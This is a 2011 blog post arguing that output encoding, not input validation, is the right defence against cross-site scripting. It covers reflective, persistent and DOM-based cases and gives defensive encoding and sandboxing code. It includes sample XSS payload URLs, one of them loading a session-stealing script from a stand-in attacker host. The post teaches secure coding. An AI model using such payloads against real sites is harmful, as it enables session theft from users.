9.08.2011

XSS - Validation vs. Encoding

I seem to have sparked another one of those lively internet conversations that I tend to start from time to time. This time, the topic of debate was mitigating XSS. I posted a response to a series of articles I have read lately that either imply or blatantly state that Input Validation is the proper way to mitigate XSS. I wholeheartedly disagree with this assertion.

What is Cross-Site Scripting?
Personally, I have always thought this is a horrible name for this vulnerability. The attack is performed by exploiting a vulnerability local to the codebase of the application. The Cross-Site part of XSS is really about the impact of the vulnerability rather than the vulnerability itself. An attacker can leverage weak security on a vulnerable site to include a payload hosted on another site.

That being said, XSS can be defined as a vulnerability that occurs when an attacker is able to break out of a data context and execute arbitrary code using crafted data. More simply put, XSS is nothing more than a buzzword for a specific type of Command Injection vulnerability. Let's examine:

<!-- /search.jsp -->
<div id="my-custom-div">
   Your search for ${request.getParameter("q")} returned '${results.size}' results
</div>

What could go wrong here?

http://my.server.com/search.jsp?q=<script>alert(document.cookie)</script>
http://my.server.com/search.jsp?q=<script src="http://evil.com/steal-session.js"></script>

These are some very naive attacks that can work. Notice that the second example also illustrates the Cross-Site part of the Cross-Site Scripting vulnerability: it is a cross-site payload to a command injection vulnerability. The vulnerability is not the cross-site part at all; in fact, the script tag acts exactly as it is specified to.

Data vs Execution Context
This is a subject that has been covered a hundred million times before by people a lot smarter than me, so I will provide a brief summary of what it means in the context of XSS:

Legend: in the snippets below, command, parameter, attr, and selector represent the execution environment; data represents untrusted data.

HTML Context:
<command parameter="data" parameter="data">data</command>

Javascript Context:
command("data");
var var_name="data";

Style Context:
selector {
   attr: data;
   attr: command(data);
}

Highly Diluted Context:
<command style="attr: command(data)" onclick="command('data')" param="data">data</command>
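
To make the legend concrete, here is a minimal JavaScript sketch (the function names are my own, not from any particular library) of how the same untrusted value has to be encoded differently depending on which context it lands in:

// Illustration only - a real application should use a vetted encoding
// library rather than hand-rolled helpers like these.

// HTML context: neutralize the characters that let data become markup.
function encodeForHtmlContext(data) {
   return String(data)
      .replace(/&/g, '&amp;')
      .replace(/</g, '&lt;')
      .replace(/>/g, '&gt;')
      .replace(/"/g, '&quot;')
      .replace(/'/g, '&#x27;');
}

// Javascript string context: hex/unicode escape everything that is not
// alphanumeric so the data can never terminate the string or the script.
function encodeForJsStringContext(data) {
   return String(data).replace(/[^a-zA-Z0-9]/g, function (c) {
      var code = c.charCodeAt(0);
      return code > 0xff
         ? '\\u' + ('0000' + code.toString(16)).slice(-4)
         : '\\x' + ('00' + code.toString(16)).slice(-2);
   });
}

var payload = '"><script>alert(document.cookie)</script>';
encodeForHtmlContext(payload);     // safe to drop into the HTML context
encodeForJsStringContext(payload); // safe inside a quoted Javascript string
// The style context (and the highly diluted combinations) each need their
// own rules on top of these.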

Now that we have that covered, let's move into each exhibit one by one.


Exhibit A: Standard Run-Of-The-Mill XSS
This is your mommy and daddy's XSS vector: the most common type of XSS on the web today and, coincidentally, the easiest to mitigate. This is the Reflective XSS that was not only the grand-daddy of all other XSS vectors but is also still the most prevalent type of XSS issue that I find in the wild. This type of XSS is also illustrated perfectly in the example above.

By accepting untrusted input that can be modified by the end-user and rendering that input directly to the view, we have created our vulnerability. An attacker can break out of the data context simply by embedding a command in the data being submitted.

While it is possible that a strict alpha-numeric whitelist validation approach could effectively mitigate the illustrated payloads, this is often not acceptable. I used the search results page as an example here for two specific reasons:

1) Search Results Pages are where most of these issues exist.
2) Search Engines have their own parsing engines and data vs. context rules.

If the whitelist is too strict, I won't be able to perform quality searches such as

q=mfg:"Audi"+model:"A4"+year:>2010+price:<25000
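
To make the point concrete, here is a small JavaScript sketch (the regular expressions are just examples of typical whitelist rules, not anything from the actual discussion) showing how validation either breaks the feature or fails to stop the attack:

var legitimateSearch = 'mfg:"Audi" model:"A4" year:>2010 price:<25000';
var attack = '<script>alert(document.cookie)</script>';

// A strict alpha-numeric whitelist blocks the attack - and the feature.
var strict = /^[a-zA-Z0-9 ]+$/;
strict.test(legitimateSearch); // false - the legitimate query is rejected
strict.test(attack);           // false - the attack is rejected

// Loosen the whitelist enough for the search syntax and the characters the
// attack needs come right back in with it.
var loose = /^[a-zA-Z0-9 :"<>().\/-]+$/;
loose.test(legitimateSearch);  // true
loose.test(attack);            // true - validation no longer helps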


Validation simply doesn't work in this case. Yes, input validation should still happen here prior to forwarding this untrusted data to a back-end service such as Solr; however, when rendering on the view you want this to be encoded for the correct context:

<!-- /search.jsp -->
<div id="my-custom-div">
   Your search for ${encodeForHTML(request.getParameter("q"))} returned '${results.size}' results
</div>

When the untrusted data gets rendered now, it becomes:

"Your search for mfg:"Audi" model:"A4" year:&gt;2010 price:&lt;25000"

Additionally, an attempted attack from above becomes:

"Your search for &lt;script&gt;alert(document.cookie);&lt;/script&gt;"


Exhibit B: Persistent XSS
Persistent XSS really isn't any different from Reflective XSS when it comes to mitigation. The primary difference between Reflective and Persistent XSS is that Reflective XSS relies on crafting links or otherwise tricking a victim into submitting the payload to the application, whereas Persistent XSS has no such limitation. A victim only needs to visit a page that has previously been exploited, and the application delivers the payload to the victim without any additional interaction from the attacker. This is an important distinction in the way the attacks are executed; however, they are mitigated the same way: by using Output Encoding.

Exhibit C: DOM-Based XSS
DOM-Based XSS is a really interesting vector from both the attack and mitigation perspectives. What makes DOM-Based XSS so unique is that it all happens in the browser. The details of what DOM-XSS actually is are discussed ad nauseam here and here, so I will refrain from trying to explain them again. But if we examine the DOM-XSS Prevention Cheatsheet (which I contributed to at the OWASP Summit 2011 in Lisbon), you will see that once again, Output Encoding is the clear answer to solving this problem. The difference is that when dealing with DOM-XSS you are encoding with Javascript in the browser as opposed to using Server-Side encoding.
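
As a rough illustration of the client-side version of the same rule (the element id here is made up), taking an untrusted value from the URL fragment and writing it into the page through a safe DOM sink looks something like this:

// Untrusted, attacker-controllable source: the URL fragment.
var untrusted = window.location.hash.slice(1);

var target = document.getElementById('greeting'); // hypothetical element

// Dangerous sink - the browser will parse any markup in the data:
// target.innerHTML = 'Hello ' + untrusted;

// Safe sink - the data stays data no matter what it contains.
// (Older versions of IE use innerText instead of textContent.)
target.textContent = 'Hello ' + untrusted;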

Exhibit D: Edge Cases and Uncommon Vectors
In the conversation, a couple of edge cases were brought up. The first one was in dealing with File Uploads. I have to assume that the vector in question was related to this Ha.ckers.org Post. If that is indeed the case, then there are a few ways to address the problem. Output Encoding will still absolutely solve the issue: as the image filename is rendered to the view, the filename, having initially been provided by an untrusted source (the end-user), should be encoded as an HTML attribute value in the src attribute of the img tag. While I would suggest doing that anyhow, the correct mitigation here is to rename the file rather than using the filename supplied in the post headers when writing it to disk.
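
A rough sketch of the rename-on-upload idea (shown in JavaScript purely for illustration; the whitelist and helper name are hypothetical), where the name written to disk is generated by the server rather than taken from the client-supplied multipart headers:

var path = require('path');
var crypto = require('crypto');

var ALLOWED_EXTENSIONS = { '.png': true, '.jpg': true, '.jpeg': true, '.gif': true };

function safeStoredName(clientFilename) {
   // Only the extension is derived from the client value, and even that is
   // checked against a whitelist; everything else is server-generated.
   var ext = path.extname(clientFilename).toLowerCase();
   if (!ALLOWED_EXTENSIONS[ext]) {
      throw new Error('Unsupported file type');
   }
   return crypto.randomBytes(16).toString('hex') + ext;
}

// safeStoredName('"><script>alert(1)</script>.png') -> something like
// '3f9c2a7b1d44e0a9c2b7f8d1e6a4b09c.png'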

The second edge case brought up was JSON parsing. This vector is a DOM-XSS vector, but it is really about neither encoding nor validation. The problem occurs when someone uses eval to parse a JSON data payload rather than using the native JSON.parse() function that is supplied in all modern browsers and can be back-ported to older browsers.
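
A quick sketch of the difference:

var response = '{"user":"alice","admin":false}';

// Risky: eval executes whatever the response happens to contain. If an
// attacker can influence the response, this is script execution.
// var data = eval('(' + response + ')');

// Safe: JSON.parse only accepts strict JSON and never executes code.
var data = JSON.parse(response);

try {
   JSON.parse('alert(document.cookie)');
} catch (e) {
   // SyntaxError - the "payload" is rejected instead of executed.
}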

The last vector that was discussed was untrusted javascript and/or JSONP. Untrusted javascript and JSONP should never be executed in the scope of the document. This is neither a validation nor an encoding issue, because it is not really an XSS issue at all. These vectors are all about trust, and untrusted code should never be executed in the same scope or context as trusted code. The correct way to mitigate data theft via untrusted script inclusion or JSONP is to execute that code in a sandbox or closure, where you can limit the scope of the execution context using a whitelist approach. Gareth Heyes has created some great sandboxing implementations, released as OWASP Projects, to help combat these attack vectors.
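
To illustrate just the scope-limiting idea (this is not one of the projects mentioned above, and all of the names are invented), the untrusted code can be handed a whitelisted API object inside a closure instead of being dropped straight into the global scope:

// The untrusted widget code is loaded as a function rather than as a raw
// script tag in the document, and only ever receives the whitelisted api
// object that the closure exposes.
var widgetSandbox = (function () {
   var api = {
      log: function (msg) { console.log('[widget] ' + String(msg)); },
      getTheme: function () { return 'dark'; }
   };

   return {
      run: function (untrustedFn) {
         // The whitelisted api is the only thing handed to the untrusted
         // function - not document, not cookies, not application objects.
         return untrustedFn(api);
      }
   };
}());

// Usage: the third-party code is wrapped as a function and invoked here.
widgetSandbox.run(function (api) {
   api.log('initialised with theme ' + api.getTheme());
});

A closure on its own is not a complete sandbox - the untrusted function can still reach globals directly - so the dedicated sandboxing projects go further and rewrite or restrict the untrusted source before running it.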

Closing Statements
While I could (and maybe should) go into greater detail in each one of these areas, my main point with this post was to express that while Input Validation is a good idea for many, many reasons, it is not the answer to one of the most prevalent bugs on the interwebz. Output Encoding remains the best practice for mitigating these attacks, and by claiming otherwise we are doing a disservice to developers who really want to write more secure code.

Update 1:
James Jardine has posted an excellent follow-up to this post on his blog over at http://www.jardinesoftware.net/2011/09/09/xss-validation-vs-encoding/